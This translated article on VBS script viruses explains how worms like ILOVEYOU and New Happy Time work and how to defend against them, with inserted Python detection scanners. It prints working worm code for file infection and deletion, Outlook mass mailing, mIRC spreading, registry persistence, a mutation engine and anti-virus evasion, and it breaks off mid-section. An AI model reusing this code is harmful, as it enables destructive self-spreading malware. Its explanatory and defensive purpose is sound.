"VBS" script virus characteristics and how to prevent (transfer)

xiaoxiao2021-03-06  89

The spread of the network has made our world richer, but it has also brought trouble. You receive an e-mail with the subject "I love you" and excitedly click the attachment; after browsing a website you trusted, you find that every folder now opens very slowly. When do you realise that a virus has broken into your world? The "Macrovirus" network worm broke out in Europe and the United States on May 4, 2000. Because it propagated through the e-mail system, it swept across millions of computers around the world in just a few days, including the enterprise networks of Microsoft, Intel and other large companies, and global economic losses reached billions of dollars. The New Happy Time virus that broke out last year made things even more bitter for the majority of computer users.

Both of the viruses mentioned above were written in VBScript. VBS script viruses, of which the Macrovirus and New Happy Time are typical representatives, are very rampant, and one important reason is that they are very simple to write. Below we analyse the various aspects of VBS script viruses one by one:

I. Characteristics and current state of VBS script viruses

VBS viruses are written in VBScript. This scripting language is very powerful: it exploits the open nature of the Windows system, and by calling ready-made Windows objects and components it can directly control the file system, the registry and so on. It should be said that a virus is a kind of idea, and this idea is extremely easy to implement in VBS. VBS script viruses have the following characteristics:

1. Simple to write. A virus enthusiast who previously knew nothing about viruses can produce a new virus in a short time.

2. Great destructive power. The damage is not limited to destroying the user's system files and degrading performance; such a virus can also crash mail servers and cause serious network congestion.

3. Strong infectivity. Because the script is executed directly by an interpreter and does not have to deal with the complex PE file format, such viruses can infect other files of the same type directly by self-replication, and exception handling is very easy.

4. Wide propagation range. Such viruses can spread across the world in a short time through HTM documents, e-mail attachments or other means.

5. Virus source code is easy to obtain and many variants appear. Because a VBS virus is interpreted, its source code is highly readable, and even when the virus source is encrypted, recovering it is still relatively simple. As a result this type of virus has many variants: slightly changing the structure of the virus or modifying its signature bytes may leave many anti-virus products powerless.

6. Strongly deceptive. Script viruses often use various tricks to keep users from noticing. For example, the mail attachment name uses a double suffix such as .jpg.vbs; because the system does not display the last suffix, the user sees the file and takes it for a JPG image.

7. Virus generators are very easy to build. A so-called virus generator is a program that produces viruses according to the user's wishes. (Most current virus generators are in fact script virus generators, mainly because scripts are interpreted, which makes such a generator very easy to implement; this is discussed later.)

Because of the above characteristics, script viruses develop extremely rapidly, and the emergence of virus generators in particular has made it very easy to produce new script viruses.

II. Analysis of VBS script virus principles

1. How a VBS script virus infects and searches for files

VBS script viruses generally infect by direct self-replication. Most viruses can attach their code to other programs of the same type; for example, New Happy Time appends its own code to the end of .htm files and adds a statement that calls the virus code, while the Macrovirus directly generates a copy of the file, copies the virus code into it, and names the virus file with the original file name as prefix and .vbs as suffix. Below we take part of the Macrovirus code to analyse how such viruses infect and search for files. The following are the key lines of the file-infection code:

Set fso = CreateObject("Scripting.FileSystemObject")    ' create a file system object
Set self = fso.OpenTextFile(WScript.ScriptFullName, 1)  ' open the current file (i.e. the virus itself) for reading
vbscopy = self.ReadAll                                  ' read the whole virus code into the string variable vbscopy
...
' "targetfile" below is the page's placeholder for the File object being infected
Set ap = fso.OpenTextFile(targetfile.Path, 2, True)     ' open the target file for writing, ready to receive the virus code
ap.Write vbscopy                                        ' overwrite the target file
ap.Close
Set cop = fso.GetFile(targetfile.Path)                  ' get the target file by its path
cop.Copy(targetfile.Path & ".vbs")                      ' create another virus file (with .vbs as suffix)
targetfile.Delete(True)                                 ' delete the target file

The above shows how the virus infects a normal file: it first reads itself into the string variable vbscopy, overwrites the target file with this string, creates a copy of that file named with the target file name as prefix and .vbs as suffix, and finally deletes the target file.

Below we analyse the file search code specifically:

' This function searches for files that meet the condition and creates a virus copy for each matching file.
Sub Scan(Folder_)                            ' scan function definition
    On Error Resume Next                     ' on error, skip the statement so that no error dialog pops up
    Set folder_ = fso.GetFolder(Folder_)
    Set files = folder_.Files                ' collection of all files in the current directory
    For Each file In files
        ext = fso.GetExtensionName(file)     ' get the file suffix
        ext = LCase(ext)                     ' convert the suffix to lowercase
        If ext = "mp5" Then                  ' if the suffix is mp5, infect the file
            ' (create test files with this suffix yourself; use an uncommon suffix so that normal programs are not damaged)
            WScript.Echo(file)
        End If
    Next
    Set subfolders = folder_.SubFolders
    For Each subfolder In subfolders         ' search the other directories by recursive call
        Scan(subfolder)
    Next
End Sub

The above is the file search code of a VBS script virus. The search part of the Scan() function is quite short and very clever: it uses a recursive algorithm to traverse every directory and file of the partition.
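A defender-side check that follows from the infection routine just described, as an added example (not part of the original article): the virus leaves behind files named with the original name as prefix and .vbs as suffix and deletes the original, so a recursive scan for double-extension script files, recording whether the original still sits beside each one, surfaces both infected copies and disguised attachments such as the .jpg.vbs names mentioned in section I. The suffix lists and the sample directory tree are constructed for the demonstration, and the check is written in Python rather than VBS so that it can be run from a clean machine.

```python
"""Find files named the way the infection routine above names its copies
(original name + script suffix, e.g. photo.jpg.vbs) and report whether the
original is still beside them.  Added example, not the page's code; the
suffix lists and the sample tree are constructed."""
import os
import tempfile

SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "hta"}
# Constructed list of suffixes a user would expect to be data, not code.
DATA_EXTS = {"jpg", "jpeg", "gif", "bmp", "txt", "doc", "xls", "htm", "html",
             "mp3", "zip", "pdf"}


def is_double_extension_script(name: str) -> bool:
    """True for names like photo.jpg.vbs: a data-looking suffix in front of a
    script suffix that Explorer hides by default."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] in SCRIPT_EXTS and parts[-2] in DATA_EXTS


def find_infection_artifacts(root: str) -> list:
    """Walk root recursively (as Scan() does) and return a sorted list of
    (relative_path, original_present) for every double-extension script."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        present = {f.lower() for f in files}
        for f in files:
            if is_double_extension_script(f):
                original = f.rsplit(".", 1)[0]          # photo.jpg.vbs -> photo.jpg
                rel = os.path.relpath(os.path.join(dirpath, f), root).replace(os.sep, "/")
                hits.append((rel, original.lower() in present))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed tree: an infected copy whose original was deleted, one whose
    original survives, a disguised attachment in a subfolder, and harmless files."""
    root = tempfile.mkdtemp(prefix="vbs_scan_")
    os.makedirs(os.path.join(root, "inbox"))
    for rel in ("photo.jpg.vbs", "notes.txt", "notes.txt.vbs", "image.jpg",
                "script.vbs", "inbox/beauty.jpg.vbs"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("' placeholder content\n")
    return root


if __name__ == "__main__":
    for path, original_present in find_infection_artifacts(build_sample_tree()):
        print(f"{path}\toriginal still present: {original_present}")
```

A hit whose original is missing matches the infect-then-delete sequence above; a hit whose original is still present is more likely a freshly dropped attachment that has not yet been run. Plain script.vbs is deliberately not reported, since the check targets the disguise, not script files as such.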

2. Several ways VBS script viruses propagate over the network, with code analysis

VBS script viruses spread widely mainly because of their network propagation functions. In general, VBS script viruses use the following ways:

1) Propagation via e-mail attachments

This is a very common propagation method. The virus can obtain legitimate e-mail addresses in various ways; the most common is to take the addresses directly from the Outlook address book, but it can also search the user's documents (such as HTM files) for e-mail addresses.

Below we analyse specifically how a VBS script virus does this:

Function MailBroadcast()
    On Error Resume Next
    WScript.Echo
    Set OutlookApp = CreateObject("Outlook.Application")       ' create an Outlook application object
    If OutlookApp = "Outlook" Then
        Set mapiobj = OutlookApp.GetNameSpace("MAPI")           ' get the MAPI namespace
        Set addrlist = mapiobj.AddressLists                     ' get the address lists
        For Each addr In addrlist
            If addr.AddressEntries.Count <> 0 Then
                addrentcount = addr.AddressEntries.Count         ' number of e-mail entries in this address list
                For addrentIndex = 1 To addrentcount             ' walk the e-mail addresses of the address list
                    Set item = OutlookApp.CreateItem(0)          ' get a mail item instance
                    Set addrent = addr.AddressEntries(addrentIndex)   ' get the specific e-mail address
                    item.To = addrent.Address                    ' fill in the recipient address
                    item.Subject = "Viral Communication Experiment"   ' write the mail subject
                    item.Body = "Here is the viral email propagation test, you should not panic!"   ' write the mail body
                    Set attachments = item.Attachments           ' define the mail attachment
                    ' FileSysObj and ShellObj are created elsewhere in the virus (not shown in this fragment)
                    attachments.Add FileSysObj.GetSpecialFolder(0) & "\Test.jpg.vbs"
                    item.DeleteAfterSubmit = True                ' delete automatically after submission
                    If item.To <> "" Then
                        item.Send                                ' send the mail
                        ShellObj.RegWrite "HKCU\Software\MailTest\MAILED", "1"   ' virus marker to avoid repeated mailing
                    End If
                Next
            End If
        Next
    End If
End Function

2) Propagation through LAN shares

LAN share propagation is also a very common and effective network propagation approach. In general, for communication within a LAN there must be many shared directories, and they have fairly loose permissions; for example, a share created on Windows 2000 is writable by default. Such a virus can spread its code into these directories by searching for the shared directories.

In VBS there is an object for enumerating and operating on the shared folders of the network neighbourhood. The virus uses this object to achieve propagation.

welcome_msg = "Network Connection Search Test"
Set WshNetwork = WScript.CreateObject("WScript.Network")   ' create a network object
Set oPrinters = WshNetwork.EnumPrinterConnections          ' build the list of network printer connections
WScript.Echo "Network Printer Mappings:"
For i = 0 To oPrinters.Count - 1 Step 2                    ' display the network printer connections
    WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i + 1)
Next
Set colDrives = WshNetwork.EnumNetworkDrives               ' build the list of network share connections
If colDrives.Count = 0 Then
    MsgBox "There is no network drive that can be listed.", vbInformation + vbOKOnly, welcome_msg
Else
    strMsg = "Current network drive connections:" & vbCrLf
    For i = 0 To colDrives.Count - 1 Step 2
        strMsg = strMsg & Chr(13) & Chr(10) & colDrives(i) & Chr(9) & colDrives(i + 1)
    Next
    MsgBox strMsg, vbInformation + vbOKOnly, welcome_msg   ' display the current network drive connections
End If

The above is a complete script that finds the current printer connections and network share connections and displays them. Once the shared connections are known, files in them can be read and written directly.

3) Propagation through web files such as HTM, ASP, JSP and PHP

Today WWW services are very common, and a virus that infects HTM files can infect the machine of every user who visits the web page.

The reason a virus can exercise such powerful functions inside an HTM document is the same principle used by the vast majority of web malicious code. Basically they all use the same code (other code could be used too); this code is the key that lets the virus use FSO, WSH and other objects from within the web page. In the registry under HKEY_CLASSES_ROOT\CLSID\ we can find the key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, registered as "Windows Script Host Shell Object", and likewise {0D43FE01-F093-11CF-8940-00A0C9054228}, registered as "FileSystem Object". The code below initialises COM and obtains the corresponding component objects; after that the virus can use the FSO and WSH objects normally and call their powerful features. The code is as follows:

Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()                 ' create an instance
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()                 ' create an instance
Set FSO = AppleObject.GetObject()

Other file types are not analysed further here.

4) Propagation through IRC chat channels

A virus that spreads through IRC generally uses code like the following (taking mIRC as an example):

Dim mirc
Set fso = CreateObject("Scripting.FileSystemObject")
Set mirc = fso.CreateTextFile("c:\mirc\script.ini")                  ' create the file script.ini
fso.CopyFile WScript.ScriptFullName, "c:\mirc\attachment.vbs", True  ' back up the virus file as attachment.vbs
mirc.WriteLine "[script]"
' send the virus file to the other users in the channel with /dcc send $nick attachment.vbs
mirc.WriteLine "n0=on 1:join:*.*:{ if ($nick != $me) { halt } /dcc send $nick c:\mirc\attachment.vbs }"
mirc.Close

The above code writes a single line into script.ini; in practice much more code is written. script.ini stores the commands that control the IRC session, and they can be executed automatically. For example, the Tune.vbs virus modifies C:\mirc\script.ini and C:\mirc\mirc.ini so that whenever an IRC user joins an infected channel, they receive a copy of Tune.vbs sent via DCC. Similarly, if PIRCH98 is installed in the C:\PIRCH98 directory of the target computer, the virus modifies C:\PIRCH98\Events.ini and C:\PIRCH98\Pirch98.ini, so that whenever IRC users join infected channels they receive a Tune.vbs sent via DCC.

In addition, viruses can also be propagated through the widely popular Kazaa. The virus copies itself into Kazaa's default shared directory, so that when other users access this machine they may download the virus file and execute it. This propagation method may gain ground as Kazaa's peer-to-peer sharing tool becomes more popular.

There are other propagation methods; we will not list them one by one here.

3. How a VBS script virus obtains control

How does the virus obtain control? This is a rather interesting topic, and VBS script viruses seem to have explored it thoroughly. The author lists several typical methods:

1) Modifying registry keys

Windows automatically loads the programs named in the values under the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run key. A script virus can add a value pointing to the virus program here, so that control is obtained whenever the machine starts. Modifying the registry is relatively simple and can be done directly with the following statement:

WshShell.RegWrite strName, anyValue [, strType]

2) Executing through file associations

For example, New Happy Time changes the program that handles DLL files to WScript.exe. The association for EXE files can even be pointed at the virus code.

3) Deceiving the user into running the virus

This method actually exploits the user's psychology. For example, the virus uses a double-suffix file name when sending an attachment; since the last suffix is not displayed by default, the attachment appears as beauty.jpg, and the user will often click on it, taking it for a picture. Similarly, when the virus infects a file on the user's own disk, it creates a virus file with the original file name as prefix and .vbs as suffix and deletes the original file, so the user may run this VBS file thinking it is the original.

4) Desktop.ini and Folder.htt working together

These two files can be used to configure the Active Desktop or to customise a folder. If a user's directory contains these two files, the virus code in Folder.htt is triggered when the user enters the directory. This is a rather effective method of obtaining control used by the New Happy Time virus. Folder.htt can also be used to trigger an EXE file, which may also become an effective way for viruses to obtain control!

There are still many ways for a virus to obtain control, and there is considerable room left to explore.
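Two of the control-gaining mechanisms above can be audited offline, as an added example that is not part of the original article: Run-key values that launch a script interpreter or a script file, read here from a .reg export of the key (the format regedit produces with /e), and folders that carry both Desktop.ini and Folder.htt. The code is Python rather than VBS so that it runs from a clean machine; the .reg text and the directory tree are constructed test data, and RunOnce is checked alongside Run as an assumption about what an auditor would also want to see.

```python
"""Audit two persistence mechanisms described above: script launchers in the
Run keys of an exported .reg file, and folders carrying both desktop.ini and
folder.htt.  Added example, not the page's code; the .reg text and the
directory tree below are constructed test data."""
import os
import re
import tempfile

# Run and (assumed also relevant) RunOnce, matched on the key path suffix.
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")
# A value is suspicious if it names a script host or a script file suffix.
SCRIPT_LAUNCH = re.compile(r"\b(wscript|cscript|mshta)(\.exe)?\b|\.(vbs|vbe|js|jse|wsf|hta)\b", re.I)
# "name"="value" line of a .reg file (backslashes and quotes are escaped with \).
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)


def script_run_entries(reg_text: str) -> list:
    """Return (key, value_name, command) for every Run/RunOnce value whose
    command launches a script host or a script file."""
    hits, key = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]                      # a new key section starts
            continue
        if key is None or not key.lower().endswith(RUN_KEYS):
            continue
        m = VALUE_RE.match(line)
        if m:
            name, value = _unescape(m.group(1)), _unescape(m.group(2))
            if SCRIPT_LAUNCH.search(value):
                hits.append((key, name, value))
    return hits


def folder_htt_pairs(root: str) -> list:
    """Relative paths of every directory under root that holds both
    desktop.ini and folder.htt (case-insensitive), sorted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        names = {f.lower() for f in files}
        if {"desktop.ini", "folder.htt"} <= names:
            hits.append(os.path.relpath(dirpath, root).replace(os.sep, "/"))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed tree: one folder with the pair, one with desktop.ini only, one clean."""
    root = tempfile.mkdtemp(prefix="htt_audit_")
    layout = {"photos": ("desktop.ini", "folder.htt", "a.jpg"),
              "docs": ("desktop.ini",),
              "clean": ("readme.txt",)}
    for rel, names in layout.items():
        os.makedirs(os.path.join(root, rel))
        for n in names:
            open(os.path.join(root, rel, n), "w").close()
    return root


# Constructed .reg export: two benign launchers, two script launchers.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE"
"Updater"="wscript.exe C:\\WINDOWS\\system32\\update.vbs"
"Helper"="C:\\Temp\\beauty.jpg.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Ctfmon"="ctfmon.exe"
'''

if __name__ == "__main__":
    for key, name, value in script_run_entries(SAMPLE_REG):
        print(f"{key}\n  {name} = {value}")
    print("desktop.ini + folder.htt:", folder_htt_pairs(build_sample_tree()))
```

The Run-key check flags the interpreter as well as the suffix, because a value such as wscript.exe followed by a path is how a script is normally launched from that key; a bare .vbs path relies on the file association, which the page notes can itself be redirected.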

4. Several techniques VBS script viruses use against anti-virus software

To survive, a virus also needs the ability to counter anti-virus software. In general, VBS script viruses use the following methods against anti-virus software:

1) Self-encryption

For example, the New Happy Time virus can randomly choose a key to encrypt part of its own code, so that the virus code is different on each infection, achieving a polymorphic effect. This creates some difficulty for traditional signature-based detection. A virus can go further and use mutation techniques so that even the decrypted code differs after each infection.

Look at a simple VBS script mutation engine (from Flyshadow):

Randomize
Set of = CreateObject("Scripting.FileSystemObject")      ' create a file system object
vc = of.OpenTextFile(WScript.ScriptFullName, 1).ReadAll   ' read its own code
fs = Array("of", "vc", "fs", "fsc")                       ' the identifiers that are about to be replaced
For fsc = 0 To 3
    ' replace each identifier in fs with 4 random uppercase letters
    vc = Replace(vc, fs(fsc), Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) _
                 & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65))
Next
of.OpenTextFile(WScript.ScriptFullName, 2, 1).WriteLine vc   ' write the replaced code back to the file

The above code makes the VBS file replace the four strings of, vc, fs and fsc with random strings each time it runs, which greatly hinders anti-virus software from extracting a signature.

2) Clever use of the Execute function

Friends who have written VBS programs may have been surprised: when an ordinary program uses the FileSystemObject object, some anti-virus software reports a high risk when scanning it, yet some VBS script viruses also use FileSystemObject and trigger no warning. The reason is simple: these viruses make clever use of the Execute method. When some anti-virus software checks for VBS viruses, it looks at whether the program uses the FileSystemObject object and raises an alarm if it does. If the virus turns this declaration into a string and runs it through the Execute(string) function, it can evade some anti-virus software.

3) Changing the way certain objects are declared

For example, change

Set fso = CreateObject("Scripting.FileSystemObject")

into

Set fso = CreateObject("Script" & "ing.FileSyste" & "mObject")

so that the FileSystemObject object is not found when the anti-virus software scans statically.
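Whether the object is obtained by ProgID, by the CLSIDs listed in the HTM section, or through the split-literal and Execute tricks of 2) and 3), the string that names the object must still be present somewhere in the file, and the mutation engine in 1) only renames variables. A static scanner that re-joins concatenated literals and splices Execute(...) strings back into the code before searching for those names therefore sees through all three evasions. This is an added example written in Python, not the page's or any product's code; the indicator table and the sample scripts are constructed, and the tokenizer does not special-case quotes inside ' comments, which is an assumed simplification.

```python
"""Static indicator scan for VBS/HTM text that undoes literal splitting
("Script" & "ing...") and Execute("...") wrapping before searching for the
object names the page lists.  Added example, not the page's code; the
indicator table and the sample scripts are constructed."""
import re

# Object ProgIDs and CLSIDs named in the article, plus a self-read marker.
INDICATORS = {
    "fso_progid": "scripting.filesystemobject",
    "fso_clsid": "{0d43fe01-f093-11cf-8940-00a0c9054228}",
    "wsh_shell_progid": "wscript.shell",
    "wsh_shell_clsid": "{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}",
    "outlook_progid": "outlook.application",
    "network_progid": "wscript.network",
    "reads_own_source": "wscript.scriptfullname",
}
# A code token ending in Execute( / ExecuteGlobal( / Eval( right before a literal.
EXEC_TAIL = re.compile(r"\b(?:execute|executeglobal|eval)\s*\(?\s*$", re.I)


def tokenize(src: str) -> list:
    """Split into ('code', text) and ('str', content) tokens; a doubled quote
    inside a VBScript literal is one quote character."""
    tokens, buf, i = [], [], 0
    while i < len(src):
        if src[i] != '"':
            buf.append(src[i]); i += 1
            continue
        if buf:
            tokens.append(("code", "".join(buf))); buf = []
        content, i = [], i + 1
        while i < len(src):
            if src[i] == '"':
                if src[i:i + 2] == '""':
                    content.append('"'); i += 2; continue
                break
            content.append(src[i]); i += 1
        tokens.append(("str", "".join(content)))
        i += 1                                    # skip the closing quote
    if buf:
        tokens.append(("code", "".join(buf)))
    return tokens


def join_literals(tokens: list) -> tuple:
    """Merge  "a" & "b"  into  "ab"  (the trick in 3) above)."""
    tokens, out, joined, i = list(tokens), [], 0, 0
    while i < len(tokens):
        if (tokens[i][0] == "str" and i + 2 < len(tokens)
                and tokens[i + 1][0] == "code" and tokens[i + 1][1].strip() == "&"
                and tokens[i + 2][0] == "str"):
            tokens[i + 2] = ("str", tokens[i][1] + tokens[i + 2][1])
            joined += 1; i += 2
            continue
        out.append(tokens[i]); i += 1
    return out, joined


def unwrap_execute(tokens: list) -> tuple:
    """Splice the literal handed to Execute(...) back in as code (the trick in 2))."""
    out, unwrapped, i = [], 0, 0
    while i < len(tokens):
        kind, text = tokens[i]
        if kind == "code" and EXEC_TAIL.search(text) and i + 1 < len(tokens) and tokens[i + 1][0] == "str":
            out.append(("code", EXEC_TAIL.sub(" ", text) + " " + tokens[i + 1][1] + " "))
            unwrapped += 1; i += 2
            if i < len(tokens) and tokens[i][0] == "code" and tokens[i][1].lstrip().startswith(")"):
                out.append(("code", tokens[i][1].lstrip()[1:])); i += 1   # drop Execute's closing paren
            continue
        out.append(tokens[i]); i += 1
    return out, unwrapped


def render(tokens: list) -> str:
    return "".join(t if k == "code" else '"' + t.replace('"', '""') + '"' for k, t in tokens)


def normalize(src: str) -> tuple:
    """Repeat unwrap + join until nothing changes; returns (text, joined, unwrapped)."""
    text, joined, unwrapped = src, 0, 0
    while True:
        toks, n_exec = unwrap_execute(tokenize(text))
        toks, n_join = join_literals(toks)
        text, joined, unwrapped = render(toks), joined + n_join, unwrapped + n_exec
        if n_exec == 0 and n_join == 0:
            return text, joined, unwrapped


def scan(src: str) -> dict:
    """Indicators present after de-obfuscation, and which of them a plain
    substring search of the raw text would have missed."""
    text, joined, unwrapped = normalize(src)
    low, raw = text.lower(), src.lower()
    found = {k: v in low for k, v in INDICATORS.items()}
    hidden = sorted(k for k, v in INDICATORS.items() if v in low and v not in raw)
    return {"found": found, "hidden_by_obfuscation": hidden,
            "joined_literals": joined, "unwrapped_execute": unwrapped}


# Constructed samples: plain, split literal, Execute-wrapped split literal, HTM CLSID use.
PLAIN = 'Set fso = CreateObject("Scripting.FileSystemObject")\n'
SPLIT = 'Set fso = CreateObject("Script" & "ing.FileSyste" & "mObject")\n'
EXEC_SPLIT = 'Execute("Set fso = CreateObject(""Script"" & ""ing.FileSystemObject"")")\n'
HTM_CLSID = 'AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")\n'

if __name__ == "__main__":
    for name, sample in [("plain", PLAIN), ("split", SPLIT), ("execute", EXEC_SPLIT), ("htm", HTM_CLSID)]:
        print(name, scan(sample))
```

The indicators are deliberately object names, CLSIDs and a method reference rather than variable names, so the random renaming performed by the mutation engine does not affect them; what it cannot rename is the ProgID string passed to CreateObject or the CLSID passed to setCLSID.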

4) Shutting down anti-virus software directly

VBS scripts are powerful: they can compare process names directly, and if a process is found to belong to anti-virus software, shut it down and delete some of its key programs.

5. Principle of VBS virus generators

A so-called virus generator is software that can directly generate virus source code according to the user's choices. To many people this may seem incredible, but for script viruses its implementation is actually very simple.

Scripting languages are interpreted and need no compilation; there is no checksum or offset positioning within the program, and the separation between statements is quite clear. So the virus functions are first made into a number of independent modules; after the user makes a selection, the generator only needs to piece together the corresponding function modules and finally perform the corresponding code replacement and optimisation. For reasons of space and others, this is not described in detail.

III. How to prevent VBS script viruses

1. How to extract an (encrypted) script virus from a sample

For an unencrypted script virus we can find the code directly in the virus sample. Here we introduce how to extract an encrypted VBS script virus from a sample, taking New Happy Time as an example.

Open Folder.htt with Jediedit. We find that this document has only 93 lines: the first line, a few lines of comments after it, then the beginning and the tail. I believe everyone knows this type of file!

Lines 87 to 91 are the following statements:

87: